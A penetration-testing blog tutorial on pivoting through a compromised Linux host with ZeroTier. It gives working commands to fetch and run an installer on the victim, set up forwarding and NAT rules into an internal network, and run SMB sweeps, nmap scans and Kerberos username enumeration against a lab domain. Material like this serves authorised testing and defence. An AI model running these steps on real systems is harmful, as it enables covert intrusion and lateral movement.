Axis Shift: Pivoting using ZeroTier
Pivoting is a specific process in post-exploitation in which an attacker expands his presence in the network. This article is about pivoting using ZeroTier.
Pivoting is a specific process in post-exploitation in which an attacker expands his presence in the network. This article is about pivoting using ZeroTier.
Caster - Axis Shift
Genre: Offensive
Label: exploit.org
Release Date: 04.09.2024
Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
Intro
Pivoting (from the word pivot) - is a phenomenon in which a specific post-exploitation process occurs in which the attacker expands his presence in the network. The attacker during this phase bypasses network isolation, FW, NAT, and other network interferences. There is no such thing as which pivoting method is best, it is a case-by-case basis. In the context of this article we will talk about ZeroTier.
Disclaimer
This article is for informational purposes and is intended for security specialists conducting testing under an agreed contract. The author and exploit.org are not responsible for any damage caused by the use of the information provided.
Disruption of systems, hacking into other people's computer networks will be prosecuted. Be careful and do not try your luck.
What is ZeroTier?
ZeroTier - is a software that allows you to create Virtual Private Networks (VPNs) on top of your existing Internet infrastructure. It is essentially a solution for connecting different devices and networks into a single virtual network, regardless of their physical location. ZeroTier's main advantage is its simplicity and flexibility in configuration, as well as its ability to bypass network restrictions such as NAT without the need for complex router or firewall configurations.
ZeroTier works like a virtual network, creating distributed P2P networks with minimal latency and high performance. It allows users to interconnect their devices into a single virtual space.
What's ZeroTier for?
ZeroTier is a very useful tool, it is handy for:
- Remote work: Create a virtual network to connect employees or clients working from different locations;
- Connecting disparate networks: ZeroTier allows multiple networks to be connected into a single logical network, providing connectivity between segments that cannot be physically connected;
- Pentesting: Bypasses network barriers and connects to secure network segments, making it an ideal tool for security professionals and pentesters;
- Gaming and multimedia: Create local networks to play games or share multimedia files among friends and family.
ZeroTier Plans
ZeroTier Features
ZeroTier has several features, among them:
- P2P connections: ZeroTier supports direct P2P connections between nodes, which minimizes latency and increases throughput;
- Flexible routing: Supports complex routing, including overlapping networks and dual-NAT networks;
- Cross-platform: ZeroTier runs on multiple platforms, including Windows, macOS, Linux, Android, iOS;
- Easy Setup: ZeroTier setup is simple and does not require deep knowledge of network engineering.
Benefits of ZeroTier
ZeroTier has the following advantages:
- Easy to use: ZeroTier can be set up and used even without much networking experience;
- Scalability: It allows you to easily scale your network by adding new nodes to your virtual network without having to reconfigure;
- Flexibility: It supports complex network topologies and can be used for a wide variety of applications, from simply connecting a pair of devices to creating complex enterprise networks;
- Free version: ZeroTier provides a free version, making it accessible to a wide range of users.
ZeroTier Disadvantages
Despite how good ZeroTier is, it also has drawbacks, including:
- Internet Dependency: ZeroTier requires a stable internet connection to work. Internet is not always available in pentest conditions;
- Management through the cloud: Although ZeroTier allows private networks to be created, they are managed through the cloud, which may raise privacy concerns in certain scenarios;
- Limitations of the free version: The free version has some limitations on the number of nodes in the network and functionality, which may not be sufficient for large enterprise needs;
- Potential delays: Despite support for P2P connections, there may be delays in data transfer when working across multiple nodes.
- Privileges: Using ZeroTier will require superuser privileges. This is a potential disadvantage for pentester.
ZeroTier Outro
ZeroTier in our case is a great tool for pivoting. The essence of this concept would be for an attacker to create a virtual network where they would place their machine, the compromised machine, and then through it further into the network infrastructure.
Infrastructure
For this article, I have prepared the following infrastructure. An attacker is on the Internet and has already compromised some machine inside the network, then he performed a privilege escalation and gained full control of the host. However, the compromised host has a second interface, eth1
, looking towards the corporate network where the Windows machines and the domain controller are located. Ultimately, the attacker must reach the corporate infrastructure through the compromised host by creating a ZeroTier network.
Machine | Operating System |
---|---|
Attacker | Debian 12 |
Victim | Debian 12 |
AD | Windows Server 2022 |
RB7 | Windows 10 Enterprise |
RB8 | Windows 10 Enterprise |
RB9 | Windows 10 Enterprise |
Machine | Address |
---|---|
Attacker | 89.169.135.43 |
Victim (eth0) | 192.168.0.40/24 |
Victim (eth1) | 172.16.150.225/24 |
AD | 172.16.150.222/24 |
RB7 | 172.16.150.223/24 |
RB8 | 172.16.150.221/24 |
RB9 | 172.16.150.224/24 |
Creating ZT Network
To create a ZeroTier network you need to create an account at zerotier.com, then after registering your account you'll be greeted with this:
In our case we need to select Basic. After selecting the plan, we will be greeted by the ZeroTier network management interface, it will look like this:
Click on “Create A Network” to create a ZeroTier virtual network. Next, a virtual network will be created with a unique name and ID. In my case the ID is 3efa5cb78aa3463e
and the name is suspicious_kleinrock
ZT Network Settings
When a ZeroTier virtual network is created, it is necessary to assign addressing to it so that each host within the ZeroTier virtual network has its own address on the interface. In my case, I decided to select the 192.168.196.0/24
range for the ZeroTier network:
All in all, the ZeroTier virtual network is ready, now we just need to add the machine we need. Specifically, the attacker's machine and the compromised machine.
Actions of the attacker host
To run ZeroTier on Linux distributions it must be installed, this is done very simply
ssh [email protected]
caster@caster:~$ curl -s https://install.zerotier.com | sudo bash
This command will install ZeroTier on your system, you can get started. In order to add your machine to the ZeroTier virtual network you need to know the ID of your ZeroTier virtual network and connect to it, this is done using this command:
caster@caster:~$ sudo zerotier-cli join 3efa5cb78aa3463e
200 join OK
In my case, the ID of my ZeroTier virtual network is 3efa5cb78aa3463e
Once you've connected to the ZeroTier network, you'll see this in your control panel:
The attacker host connected to the network needs to be registered on the ZeroTier network, this is accomplished by clicking this button:
The attacker's machine is now on the ZeroTier network, registered and has its address from the previously configured 192.168.196.0/24
range
Also, once the attacker's machine is connected to the ZeroTier network, it will have a virtual interface with an assigned address:
caster@caster:~$ ifconfig ztrfyp74nu
ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2800
inet 192.168.196.58 netmask 255.255.255.0 broadcast 192.168.196.255
inet6 fe80::3c2b:90ff:fedd:9263 prefixlen 64 scopeid 0x20<link>
ether 3e:2b:90:dd:92:63 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13 bytes 1006 (1.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
This completes the initial configuration of the ZeroTier virtual network, now it's time to connect the previously compromised machine to the ZT network.
Actions of the victim host
Now we need to install ZeroTier on the compromised system, in our case it is a Linux distribution - Debian 12:
@compromised:~# curl -s https://install.zerotier.com | bash
Then connecting to our ZT network:
@compromized:~# zerotier-cli join 3efa5cb78aa3463e
200 join OK
After this action, the following will appear in the ZeroTier Network Control Panel:
The compromised machine must also be authorized to be a member of the ZeroTier network and have a virtual interface with an assigned address.
Once the compromised host was authorized on the ZeroTier network, it had its own address and interface:
@compromised:~# ifconfig ztrfyp74nu
ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2800
inet 192.168.196.59 netmask 255.255.255.0 broadcast 192.168.196.255
inet6 fe80::3c2d:27ff:fe62:e6b6 prefixlen 64 scopeid 0x20<link>
ether 3e:2d:27:62:e6:b6 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 45 bytes 5651 (5.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ZeroTier Host | Address | MAC | ZeroTier Version |
---|---|---|---|
Attacker (6d3357253f) | 192.168.196.58 | 3e:2b:90:dd:92:63 | 1.14.0 |
Victim (6b84e851ea) | 192.168.196.59 | 3e:2d:27:62:e6:b6 | 1.14.0 |
Verify connectivity between the attacker and the compromised host within the ZeroTier network:
192.168.196.59
is the address of the compromised machine
Pivoting
By examining the interfaces of the compromised system, we may notice that there is a second interface eth1
leading to some network. This may well be of interest to a pentester to further penetrate the infrastructure. Through the created and configured ZeroTier network, the attacker will gain access to the network behind eth1
@compromised:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.40 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::20c:29ff:feed:82f7 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:ed:82:f7 txqueuelen 1000 (Ethernet)
RX packets 3647 bytes 3619738 (3.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3104 bytes 358721 (350.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.150.225 netmask 255.255.255.0 broadcast 172.16.150.255
ether 00:0c:29:ed:82:01 txqueuelen 1000 (Ethernet)
RX packets 8 bytes 1468 (1.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 27 bytes 3099 (3.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 2824 bytes 173142 (169.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2824 bytes 173142 (169.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2800
inet 192.168.196.59 netmask 255.255.255.0 broadcast 192.168.196.255
inet6 fe80::3c2d:27ff:fe62:e6b6 prefixlen 64 scopeid 0x20<link>
ether 3e:2d:27:62:e6:b6 txqueuelen 1000 (Ethernet)
RX packets 11 bytes 966 (966.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 65 bytes 8678 (8.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Victim Interfaces | Address |
---|---|
eth0 | 192.168.0.40 |
eth1 | 172.16.150.225 |
The compromised machine will be the gateway to the 172.16.150.0/24
network, but routing must be configured for this to work:
- Enabling routing
- Firewall settings, NAT
First you need to enable packet routing, this feature is disabled by default in Linux distributions.
@compromised:~# sysctl -w net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
This setting works only until the system reboots. To make routing work permanently, uncomment thenet.ipv4.ip_forward=1
line in the/etc/sysctl.conf
configuration file
Now you need to firewall rules (using iptables) so that the ZeroTier network can knock on the 172.16.150.0/24
segment:
First rule:
@compromised:~# iptables -A FORWARD -i eth1 -o ztrfyp74nu -m state --state RELATED,ESTABLISHED -j ACCEPT
What makes the first rule?
-A FORWARD
: Adds a rule to theFORWARD
chain, which is responsible for forwarding packets between interfaces;-i eth1
: Indicates that the rule applies to incoming packets on interfaceeth1
;-o ztrfyp74nu
: Indicates that the rule is applicable to outgoing packets that are sent through theztrfyp74nu
interface;-m state --state RELATED,ESTABLISHED
: Indicates that the rule should apply only to packets that are related to already established connections (ESTABLISHED) or to packets that are related to existing connections (RELATED);-j ACCEPT
: Indicates that packets matching this rule should be allowed.
This rule allows packets to be forwarded from interface eth1
to interface ztrfyp74nu
for those connections that have already been established or are part of a previously established connection. This is important to maintain active connections between the two interfaces, such as reply packets, and to prevent them from being blocked.
Second rule
@compromised:~# iptables -A FORWARD -i ztrfyp74nu -o eth1 -j ACCEPT
What does the second rule do?
-A FORWARD
: Adds a rule to theFORWARD
chain;-i ztrfyp74nu
: Indicates that the rule applies to incoming packets on interfaceztrfyp74nu
;-o eth1
: Indicates that the rule applies to outgoing packets that are sent over interfaceeth1
;-j ACCEPT
: Indicates that packets matching this rule should be allowed.
This rule permits forwarding of all packets from interface ztrfyp74nu
to interface eth1
. This rule is necessary so that packets that arrive on the ZeroTier interface can be forwarded to the physical network through the eth1
interface.
The attacker will also need a network route to the 172.16.150.0/24
network, this can be configured in the ZT control panel. The route to the network goes through a compromised machine inside the ZT:
192.168.196.59
- Victim's address inside the ZT network
Make sure that the necessary network route appears in the routing table on the attacker's side:
172.16.150.0 192.168.196.59 255.255.255.0 UG 5000 0 0 ztrfyp74nu
Important rule for NAT
Now we need a final rule for the firewall, and it deals with NAT:
@compromised:~# iptables -t nat -A POSTROUTING -o eth1 -s 192.168.196.0/24 -j MASQUERADE
What does this rule do?
-t nat
: This flag indicates that the rule should be added to thenat
(Network Address Translation) table. This table is used to change the source or destination addresses of packets passing through the router;-A POSTROUTING
: This flag means that the rule is added to thePOSTROUTING
chain. ThePOSTROUTING
chain processes packets after they are routed, but before they leave the interface. That is, the rule is applied at the packet's exit from the system.-o eth1
: This flag indicates that the rule applies only to packets that exit through theeth1
interface. If your Internet or other network connection interface is named differently, you must specify the appropriate interface instead ofeth1
.-s 192.168.196.0/24
: This flag indicates that the rule applies only to packets originating from the192.168.196.0/24
subnet. This is your ZeroTier subnet.-j MASQUERADE
: The-j
flag specifies the action to be performed on packets that satisfy the rule condition. In this case, the action isMASQUERADE
, which means spoofing the source IP address of the packet to an IP address that has interfaceeth1
.
When a packet comes from the 192.168.196.0/24
subnet and is routed through the eth1
interface, this rule spoofs its source IP address to the IP address of the eth1
interface. This technique is called masquerading and it is needed to access from the ZeroTier network directly to 172.16.150.0/24
Result
After all of the above configuration, the attacker has access to the 172.16.150.0/24
network that was behind the compromised machine on the second interface.
PoC I: NetExec
caster@caster:~$ netexec smb 172.16.150.0/24
SMB 172.16.150.222 445 AD [*] Windows Server 2022 Build 20348 x64 (name:AD) (domain:f1.com) (signing:True) (SMBv1:False)
SMB 172.16.150.223 445 RB7 [*] Windows 10 / Server 2019 Build 19041 (name:RB7) (domain:RB7) (signing:False) (SMBv1:False)
SMB 172.16.150.224 445 RB9 [*] Windows 10 / Server 2019 Build 19041 (name:RB9) (domain:RB9) (signing:False) (SMBv1:False)
SMB 172.16.150.221 445 RB8 [*] Windows 10 / Server 2019 Build 19041 (name:RB8) (domain:RB8) (signing:False) (SMBv1:False)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
PoC II: Services Scanning
caster@caster:~$ sudo nmap -n -sS -p 88,445,22 172.16.150.0/24 --open --min-rate=1280
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 23:36 UTC
Nmap scan report for 172.16.150.221
Host is up (0.090s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap scan report for 172.16.150.222
Host is up (0.086s latency).
Not shown: 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
88/tcp open kerberos-sec
445/tcp open microsoft-ds
Nmap scan report for 172.16.150.223
Host is up (0.087s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap scan report for 172.16.150.224
Host is up (0.087s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap scan report for 172.16.150.225
Host is up (0.086s latency).
Not shown: 2 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
PoC III: Kerberos Attacks (Enumeration)
caster@caster:~$ ./kerbrute userenum --dc ad.f1.com -d f1.com kerusernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/03/24 - Ronnie Flathers @ropnop
2024/09/03 23:56:03 > Using KDC(s):
2024/09/03 23:56:03 > ad.f1.com:88
2024/09/03 23:56:03 > [+] VALID USERNAME: [email protected]
2024/09/03 23:56:03 > [+] VALID USERNAME: [email protected]
2024/09/03 23:56:03 > [+] VALID USERNAME: [email protected]
2024/09/03 23:56:03 > Done! Tested 4 usernames (3 valid) in 0.271 seconds
Now the attacker can further interact with this subnet, look for vulnerabilities, and continue his offensive actions. This is how this pivoting method works.
But it should be taken into account that the attacker is behind NAT because of the peculiarities of network settings (NAT) on the compromised machine.
Outro
In this article, I looked at the process of pivoting using ZeroTier, a powerful tool that can greatly enhance an attacker's post-exploitation capabilities. ZeroTier makes it easy to bypass network isolation and penetrate protected network segments while providing flexibility and ease of customization.
I hope this material has been helpful in understanding the capabilities of ZeroTier in the context of pentesting. Proper use of such tools can help security professionals find and remediate vulnerabilities, thereby improving the overall security of corporate networks.